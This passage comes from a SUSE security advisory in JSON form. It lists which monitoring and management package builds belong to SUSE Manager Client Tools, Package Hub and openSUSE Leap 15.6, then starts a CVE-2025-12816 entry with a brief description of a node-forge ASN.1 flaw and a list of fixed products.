"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64"
},
"product_reference": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le"
},
"product_reference": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x"
},
"product_reference": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64"
},
"product_reference": "golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-11.6.11-150000.1.90.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64"
},
"product_reference": "grafana-11.6.11-150000.1.90.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-11.6.11-150000.1.90.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le"
},
"product_reference": "grafana-11.6.11-150000.1.90.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-11.6.11-150000.1.90.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x"
},
"product_reference": "grafana-11.6.11-150000.1.90.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-11.6.11-150000.1.90.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64"
},
"product_reference": "grafana-11.6.11-150000.1.90.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch"
},
"product_reference": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-lang-0.1.38-150000.1.30.1.noarch as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch"
},
"product_reference": "mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch"
},
"product_reference": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64 as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacecmd-5.0.15-150000.3.142.1.noarch as component of SUSE Manager Client Tools 15",
"product_id": "SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch"
},
"product_reference": "spacecmd-5.0.15-150000.3.142.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dracut-saltboot-1.1.0-150000.1.65.1.noarch as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch"
},
"product_reference": "dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64 as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64 as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.aarch64 as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.s390x as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.38-150000.1.30.1.x86_64 as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64"
},
"product_reference": "mgrctl-0.1.38-150000.1.30.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch"
},
"product_reference": "mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-lang-0.1.38-150000.1.30.1.noarch as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch"
},
"product_reference": "mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch"
},
"product_reference": "mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64 as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64 as component of SUSE Manager Client Tools for SLE Micro 5",
"product_id": "SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64 as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64 as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dracut-saltboot-1.1.0-150000.1.65.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch"
},
"product_reference": "dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64"
},
"product_reference": "golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64 as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacecmd-5.0.15-150000.3.142.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
},
"product_reference": "spacecmd-5.0.15-150000.3.142.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-12816",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-12816"
}
],
"notes": [
{
"category": "general",
"text": "An interpretation-conflict (CWE-436) vulnerability in node-forge versions 1.3.1 and earlier enables unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
